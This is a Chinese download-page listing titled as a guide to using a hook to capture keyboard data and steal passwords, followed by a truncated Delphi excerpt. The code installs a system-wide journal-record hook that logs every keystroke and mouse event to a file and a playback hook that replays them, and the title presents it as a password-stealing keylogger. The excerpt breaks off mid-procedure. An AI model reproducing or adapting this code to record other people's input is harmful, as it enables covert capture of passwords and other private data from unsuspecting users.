Hook怎样获取Keyboard资料——盗取密码

时间:2018-10-09 16:31:50
【文件属性】:

文件名称:Hook怎样获取Keyboard资料——盗取密码

文件大小:345KB

文件格式:RAR

更新时间:2018-10-09 16:31:50

Hook

function PlayProc(iCode:Integer;wParam:wParam;lParam:lParam):LRESULT;stdcall; begin canPlay:=1; Result:=0; if iCode<0 then Result:=CallNextHookEx(hPlay,iCode,wParam,lParam) else if iCode=HC_SYSMODALON then canPlay:=0 else if ((canPlay=1) and (iCode=HC_GETNEXT)) then begin if bDelay then begin bDelay:=False; Result:=50; end; // pEventMSG(lParam)^:=EventArr[PlayLog]; pEventMSG(lParam)^:=EvArr.EventArr[PlayLog]; end else if((canPlay=1) and (iCode=HC_SKIP)) then begin bDelay:=True; PlayLog:=PlayLog+1; end; // if PlayLog>=EventLogs then begin // UNHookWindowsHookEx(hPlay); if PlayLog >= EvArr.EventLogs then begin InitEventArrs(EvArr); if ReadEventArrs(EvArr,fHan) then PlayLog:=0 else begin UNHookWindowsHookEx(hPlay); CloseFileEventArrs(fHan); SendMessage(AppHandle,SANCLK,100,0); end; end; end; function HookProc(iCode: Integer;wParam: wParam;lParam: lParam):LRESULT;stdcall; begin recOK:=1; Result:=0; if iCode<0 then Result:=CallNextHookEx(hHook,iCode,wParam,lParam) else if iCode=HC_SYSMODALON then recOK:=0 else if iCode=HC_SYSMODALOFF then recOK:=1 else if ((recOK>0) and (iCode=HC_ACTION)) then begin // EventArr[EventLogs]:=pEventMSG(lParam)^; // EventLogs:=EventLogs+1; InsertEventArrs(EvArr,pEventMSG(lParam)^); // if EventLogs>=1000 then begin // UnHookWindowsHookEx(hHook); if EvArr.EventLogs >= 1000 then begin WriteEventArrs(EvArr,fHan); InitEventArrs(EvArr); end; end; end; procedure TForm1.Button1Click(Sender: TObject); begin fHan := CreateFileEventArrs(EdtFN.Text); if fHan>0 then begin InitEventArrs(EvArr); // EventLogs:=0; hHook:=SetWindowsHookEx(WH_JOURNALRECORD,HookProc,HInstance,0); Button2.Enabled:=True; Button1.Enabled:=False; end; end; procedure TForm1.Button2Click(Sender: TObject); begin UnHookWindowsHookEx(hHook); hHook:=0; WriteEventArrs(EvArr,fHan); CloseFileEventArrs(fHan); Button1.Enabled:=True; Button2.Enabled:=False; Button3.Enabled:=True; end; procedure TForm1.Button3Click(Sender: TObject); begin fHan := OpenFileEventArrs(EdtFN.Text); if fHan>0 then begin InitEventArrs(EvArr); ReadEventArrs(EvArr,fHan); PlayLog:=0;


网友评论